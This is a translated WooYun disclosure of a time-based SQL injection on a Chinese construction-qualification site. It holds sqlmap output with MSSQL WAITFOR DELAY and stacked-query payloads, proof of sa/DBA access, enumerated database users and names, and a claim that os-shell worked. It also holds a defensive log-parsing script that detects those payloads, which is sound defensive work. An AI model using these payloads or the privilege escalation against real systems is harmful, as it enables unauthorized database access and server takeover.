WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------- http://drop.zone.ci/
2016-01-05: Details reported to the vendor; awaiting vendor handling
2016-01-08: Vendor has confirmed; details disclosed to the vendor only
2016-01-18: Details disclosed to core white hats and experts in the relevant field
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public
——
Injection point:
http://**.**.**.**/zys/search/?action=list&bid=0&key=1
The key parameter is injectable; it is a time-based blind injection, so extraction is fairly slow.
[22:29:22] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:29:23] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: action=list&bid=0&key=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: action=list&bid=0&key=1' WAITFOR DELAY '0:0:5'--
---
[22:29:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:29:23] [INFO] fetching current user
[22:29:23] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[22:29:23] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:29:29] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[22:29:40] [INFO] adjusting time delay to 1 second due to good response times
[22:29:47] [ERROR] invalid character detected. retrying..
[22:29:47] [WARNING] increasing time delay to 2 seconds
current user: 'sa'
[22:29:52] [INFO] fetching current database
[22:29:52] [INFO] retrieved: Zys2010
current database: 'Zys2010'
[22:30:49] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [9]:
[*] dbtest
[*] GDWSBSDT
[*] gdzczx
[*] gdzczx5026
[*] sa
[*] smartsoft
[*] smartsoft_test
[*] vc
[*] xzxk

available databases [42]:
[*] [gdzczx5000-2014-1]
[*] [gdzczx5000-2014]
[*] [gdzczx5000-2015]
[*] [gdzczx5000-618]
[*] [gdzczx5000_2014-1-15]
[*] [gdzczx5000_2014-2-13]
[*] [gdzczx5000_2014-2-20]
[*] [gdzczx9000-copy]
[*] [RegisterManager_Test]
[*] [YM_Test]
[*] gdzczx
[*] gdzczx5000
[*] gdzczx50009888888888
[*] gdzczx50009999999999
[*] gdzczx5000_20121008
[*] gdzczx5001
[*] gdzczx5026
[*] gdzczx5027
[*] gdzczx5028
[*] gdzczx5029
[*] gdzczx_web
[*] gdzczx_web2013
[*] master
[*] model
[*] msdb
[*] QueryWork
[*] RegisterManager
[*] RegisterManager_CXXT
[*] ReportServer
[*] ReportServerTempDB
[*] Spider
[*] tempdb
[*] test
[*] TestRM
[*] XZXK
[*] XZXK5026
[*] XZXK5099
[*] Zys2010
[*] Zys2010_Test
[*] Zys2010_Test20121113
[*] 二级建造师_北京
[*] 延续注册名单
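The sqlmap output above shows the two payload shapes a defender can look for in the web tier: a stacked query after a closing quote (`'; WAITFOR DELAY ...--`) and a bare `WAITFOR DELAY` with a trailing comment, both of which also leave a tell-tale response time of roughly the requested delay. The script below is an added detection example, not part of the original report or of the affected site's code; it parses a constructed IIS W3C log excerpt (field names follow the standard `#Fields` header, the IPs, timestamps and `time-taken` values are invented) and flags requests whose URL-decoded query string matches those shapes, adding `slow-response` when `time-taken` corroborates the delay.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-format log excerpt (sample data, not from the report).
# Column order matches the '#Fields' header; time-taken is in milliseconds.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2016-01-05 22:29:22 10.0.0.5 GET /zys/search/ action=list&bid=0&key=1 80 - 203.0.113.7 Mozilla/5.0 200 48
2016-01-05 22:29:23 10.0.0.5 GET /zys/search/ action=list&bid=0&key=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.0 200 5031
2016-01-05 22:29:29 10.0.0.5 GET /zys/search/ action=list&bid=0&key=1%27+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.0 200 5019
2016-01-05 22:29:40 10.0.0.5 GET /zys/search/ action=list&bid=0&key=%E4%BA%8C%E7%BA%A7 80 - 198.51.100.3 Mozilla/5.0 200 61
"""

# Heuristics for the MSSQL time-based / stacked-query payload shapes in the
# sqlmap output. Each pattern is checked against the URL-decoded query string,
# so percent-encoding and '+' for space do not hide the payload.
PATTERNS = {
    "waitfor-delay": re.compile(r"\bwaitfor\s+delay\b", re.I),  # MSSQL delay primitive
    "stacked-query": re.compile(r"'\s*;"),                      # quote closed, new statement
    "comment-terminator": re.compile(r"--\s*$"),                # rest of the query commented out
}


def parse_iis_log(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        parts = raw.split()
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than mis-assign columns
        yield dict(zip(fields, parts))


def classify(record, slow_ms=4000):
    """Return the reasons a request looks like time-based SQLi, or [] if none."""
    query = unquote_plus(record.get("cs-uri-query", ""))
    reasons = [name for name, rx in PATTERNS.items() if rx.search(query)]
    if not reasons:
        return []  # slow responses alone are not reported; too noisy on their own
    try:
        if int(record.get("time-taken", "0")) >= slow_ms:
            reasons.append("slow-response")  # latency matches the injected delay
    except ValueError:
        pass
    return reasons


def find_time_based_sqli(text, slow_ms=4000):
    """Scan an IIS log and return the flagged requests with their reasons."""
    findings = []
    for rec in parse_iis_log(text):
        reasons = classify(rec, slow_ms)
        if reasons:
            findings.append({
                "time": rec["time"],
                "client": rec["c-ip"],
                "query": unquote_plus(rec["cs-uri-query"]),
                "time_taken_ms": int(rec["time-taken"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_time_based_sqli(SAMPLE_LOG):
        print(f["time"], f["client"], f["time_taken_ms"], "ms", f["reasons"])
        print("    ", f["query"])
```

The `slow_ms` threshold is a tuning knob: sqlmap's default delay is 5 seconds, but the output above shows it lowering the delay to 1 second and then raising it to 2, so a production rule should key on the payload pattern and treat latency only as corroboration.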
42 databases, and the server is shared with the Guangdong Provincial Construction Practice Qualification Registration Center, so the data volume is very large. Since this is time-based blind injection, I did not go any further!~~~
The test above showed DBA privileges, so I tried os-shell and found it works!~~~ and with very high privileges!~~~ Ran a few commands to check!~~~
As above.
You get the idea!~~~
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-01-08 11:08
Thank you very much for your report. The issue in the report has been confirmed and reproduced.
Affected data: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 10
We are contacting the responsible site administration unit for handling.
None at present